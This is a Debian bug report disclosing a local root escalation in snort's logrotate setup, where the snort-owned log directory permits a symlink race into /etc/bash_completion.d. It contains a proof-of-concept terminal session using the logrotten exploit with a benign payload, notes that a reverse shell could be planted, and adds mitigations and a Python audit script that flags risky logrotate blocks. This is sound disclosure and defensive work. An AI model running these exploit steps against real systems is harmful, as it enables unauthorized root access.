Package: snort
Version: 2.9.15.1-5
Severity: critical
Tags: security upstream
Justification: root security hole
X-Debbugs-Cc: [email protected]
Dear Maintainer,
The log directory of snort can be manipulated by the user "snort" in Debian Bullseye:
# ls -ld /var/log/snort/
drwxr-s--- 3 snort adm 4096 Apr 14 08:44 /var/log/snort/
The files in /var/log/snort/ (and one level of subdirectories) are rotated once a day by
logrotate running as user root, with the following config:
/var/log/snort/snort.alert /var/log/snort/snort.alert.fast /var/log/snort/*log
/var/log/snort/*/alert /var/log/snort/*/*log {
    daily
    rotate 7
    compress
    missingok
    notifempty
    create 0640 snort adm
    sharedscripts
    postrotate
        if [ -x /usr/sbin/invoke-rc.d ]; then \
            invoke-rc.d snort restart > /dev/null; \
        else \
            /etc/init.d/snort restart > /dev/null; \
        fi;
    endscript
}
Because logrotate is prone to a race condition (see the links to my blog below), it
is possible for the user "snort" to replace or create any directory in
/var/log/snort/ with a symbolic link to an arbitrary directory (for example
/etc/bash_completion.d). logrotate will then place the rotated file AS ROOT into
/etc/bash_completion.d and set its owner and group to "snort:adm".
An attacker could simply place a reverse shell into this file; as soon as root
logs in, the reverse shell is executed.
You can find an exploit for this bug at my blog:
https://tech.feedyourhead.at/content/abusing-a-race-condition-in-logrotate-to-elevate-privileges
and https://tech.feedyourhead.at/content/details-of-a-logrotate-race-condition
Proof of Concept:
#################
snort@b8ff2e70f94d:~$ cd /tm
snort@b8ff2e70f94d:/tmp$ git clone https://github.com/whotwagner/logrotten.git
Cloning into 'logrotten'...
remote: Enumerating objects: 97, done.
remote: Counting objects: 100% (10/10), done.
remote: Compressing objects: 100% (8/8), done.
remote: Total 97 (delta 4), reused 7 (delta 2), pack-reused 87
Receiving objects: 100% (97/97), 419.77 KiB | 691.00 KiB/s, done.
Resolving deltas: 100% (41/41), done.
snort@b8ff2e70f94d:/tmp$ cd logrotten/
snort@b8ff2e70f94d:/tmp/logrotten$ gcc -o logrotten logrotten.c
snort@b8ff2e70f94d:/tmp/logrotten$ echo "hello world" > payload
snort@b8ff2e70f94d:/tmp/logrotten$ mkdir /var/log/snort/pwn
snort@b8ff2e70f94d:/tmp/logrotten$ vim /var/log/snort/pwn/pwnme.lo
snort@b8ff2e70f94d:/tmp/logrotten$ ./logrotten -p payload -c /var/log/snort/pwn/pwnme.log
Waiting for rotating /var/log/snort/pwn/pwnme.log...
Renamed /var/log/snort/pwn with /var/log/snort/pwn2 and created symlink to /etc/bash_completion.d
Waiting 1 seconds before writing payload...
Done!
snort@b8ff2e70f94d:/tmp/logrotten$ ls -l /etc/bash_completion.d/
total 8
-rw-r--r-- 1 root root 439 Mar 10 2021 git-prompt
-r-xr-xr-x 1 snort adm 19 Apr 14 08:43 pwnme.log
Mitigation:
###########
The problem can be mitigated by changing the owner and group of /var/log/snort to
root, or by adding a "su snort adm" directive to the block in /etc/logrotate.d/snort
so that logrotate drops privileges before it touches that directory.
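The following audit script is an added example and is not part of this bug report, of snort
or of logrotate. It parses a logrotate snippet with a small purpose-built parser and reports
every block that logrotate would process as root while the directory holding the logs is
owned or writable by a non-root user, which is the condition that makes the
directory-to-symlink swap above possible. It is exercised against the
/etc/logrotate.d/snort block quoted earlier (abridged) and against the same block with the
"su snort adm" mitigation. The function names (parse_logrotate, controlled_dir,
risky_blocks, fake_stat, real_stat), the uid 1001 standing in for the snort account and the
directory mode 2750 read off the ls -ld output above are assumptions of the example.

```python
"""Audit a logrotate config for the bug class in this report: blocks that logrotate
processes as root (no 'su' directive) while the log directory is owned or writable
by an unprivileged user. Added example, not code from the bug report, snort or logrotate."""
import os, re, shlex, stat

SCRIPT_KEYWORDS = {"prerotate", "postrotate", "firstaction", "lastaction", "preremove"}
GLOB_CHARS = re.compile(r"[*?\[]")

def parse_logrotate(text):
    """Return (global_directives, [(patterns, directives), ...]). Covers only what
    /etc/logrotate.d snippets need: multi-line pattern lists, one directive per
    line, script bodies skipped up to 'endscript' (they are shell, not logrotate)."""
    globals_, blocks, pending, current, in_script = {}, [], [], None, False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if in_script:                     # shell text: drop it before shlex sees it
            in_script = line != "endscript"
            continue
        words = shlex.split(line, comments=True)
        if not words:
            continue
        if current is not None:           # inside a '{ ... }' block
            if words == ["}"]:
                blocks.append((pending, current))
                pending, current = [], None
            elif words[0] in SCRIPT_KEYWORDS:
                in_script = True
            else:
                current[words[0]] = words[1:]   # e.g. create -> ['0640', 'snort', 'adm']
        elif words[-1].endswith("{"):     # last pattern line; '{' fused or separate
            pending.extend(words[:-1] if words[-1] == "{" else words[:-1] + [words[-1][:-1]])
            current = {}
        elif words[0].startswith(("/", "~")):   # further patterns before the '{'
            pending.extend(words)
        else:                             # global directive such as 'su root adm'
            globals_[words[0]] = words[1:]
    return globals_, blocks

def controlled_dir(pattern):
    """Longest glob-free directory prefix: /var/log/snort/*/*log -> /var/log/snort.
    Whoever can rename entries there decides where root's rotated files land."""
    dirs = []
    for part in pattern.split("/")[1:-1]:
        if GLOB_CHARS.search(part):
            break
        dirs.append(part)
    return "/" + "/".join(dirs)

def real_stat(path):
    st = os.stat(path)
    return st.st_uid, stat.S_IMODE(st.st_mode)

def fake_stat(table):
    """stat replacement backed by {path: (uid, mode)}; avoids chown'ing real dirs."""
    def lookup(path):
        if path not in table:
            raise FileNotFoundError(path)
        return table[path]
    return lookup

def risky_blocks(text, stat_of=real_stat):
    """[(directory, patterns, reason)] for each block rotated as root whose log
    directory is not root-owned or is group/world writable. logrotate's own guard
    rejects only world-writable or non-root-group-writable directories, so one
    merely owned by the service user (snort:adm, mode 2750) passes it."""
    globals_, blocks = parse_logrotate(text)
    findings = []
    for patterns, directives in blocks:
        su = directives.get("su", globals_.get("su"))
        if su and su[0] != "root":
            continue                      # logrotate switches to that user for the block
        for directory in sorted({controlled_dir(p) for p in patterns}):
            try:
                uid, mode = stat_of(directory)
            except FileNotFoundError:
                continue
            if uid != 0:
                findings.append((directory, patterns, f"owned by uid {uid}, not root"))
            elif mode & 0o022:
                findings.append((directory, patterns, f"group/world writable (mode {mode:04o})"))
    return findings

# Constructed input: the /etc/logrotate.d/snort block quoted in this report (abridged).
SNORT_CONFIG = """\
/var/log/snort/snort.alert /var/log/snort/snort.alert.fast /var/log/snort/*log
/var/log/snort/*/alert /var/log/snort/*/*log {
    daily
    rotate 7
    create 0640 snort adm
    postrotate
        invoke-rc.d snort restart > /dev/null; \\
    endscript
}
"""
SNORT_CONFIG_FIXED = SNORT_CONFIG.replace("    daily\n", "    su snort adm\n    daily\n")  # report's 'su' fix
SNORT_DIR_STAT = fake_stat({"/var/log/snort": (1001, 0o2750)})  # as in 'ls -ld' above; uid 1001 assumed
```

To audit a live system, call risky_blocks() with the default real_stat on the text of
/etc/logrotate.conf and of each file in /etc/logrotate.d/; each file is parsed on its own,
so a global su in logrotate.conf is not carried into the snippets. Note that logrotate also
runs a block's prerotate/postrotate scripts under the su identity, so with "su snort adm" the
invoke-rc.d snort restart in the snippet no longer runs as root; making /var/log/snort
root-owned, the other option above, avoids that side effect.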
Note: I also checked the sources of the current snort (snort-2.9.19). The
source archive contains a file "snort-2.9.19/rpm/snort.logrotate" with very
similar content.
I have tested this vulnerability on Debian Bullseye with the following snort
version:
||/ Name           Version      Architecture Description
+++-==============-============-============-===========================================
ii  snort          2.9.15.1-5   amd64        flexible Network Intrusion Detection System
I also checked Debian Buster; it has a different logrotate config for
snort which doesn't seem to be affected.
-- System Information:
Debian Release: 11.3
APT prefers stable-updates
APT policy: (500, 'stable-updates'), (500, 'stable-security'), (500, 'stable')
Architecture: amd64 (x86_64)
Kernel: Linux 5.10.0-13-amd64 (SMP w/1 CPU thread)
Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8), LANGUAGE=en_US:en
Shell: /bin/sh linked to /usr/bin/dash
Init: systemd (via /run/systemd/system)
LSM: AppArmor: enabled
Versions of packages snort depends on:
ii adduser 3.118
ii debconf [debconf-2.0] 1.5.77
ii init-system-helpers 1.60
ii libc6 2.31-13+deb11u3
ii libdaq2 2.0.7-5
ii libdumbnet1 1.12-9
ii liblzma5 5.2.5-2
ii libnetfilter-queue1 1.0.5-2
ii libnghttp2-14 1.43.0-1
ii libpcap0.8 1.10.0-2
ii libpcre3 2:8.39-13
ii libssl1.1 1.1.1n-0+deb11u1
ii logrotate 3.18.0-2
ii lsb-base 11.1.0
ii net-tools 1.60+git20181103.0eebece-1
ii rsyslog [system-log-daemon] 8.2102.0-2
ii snort-common 2.9.15.1-5
ii snort-common-libraries 2.9.15.1-5
ii snort-rules-default 2.9.15.1-5
ii zlib1g 1:1.2.11.dfsg-2+deb11u1
Versions of packages snort recommends:
ii iproute2 5.10.0-4
Versions of packages snort suggests:
pn snort-doc <none>
-- debconf information:
* snort/interface: enp0s3
snort/options:
snort/invalid_interface:
snort/please_restart_manually:
snort/send_stats: true
snort/disable_promiscuous: false
* snort/address_range: 192.168.0.0/16
snort/stats_rcpt: root
snort/startup: boot
snort/stats_treshold: 1
snort/config_parameters: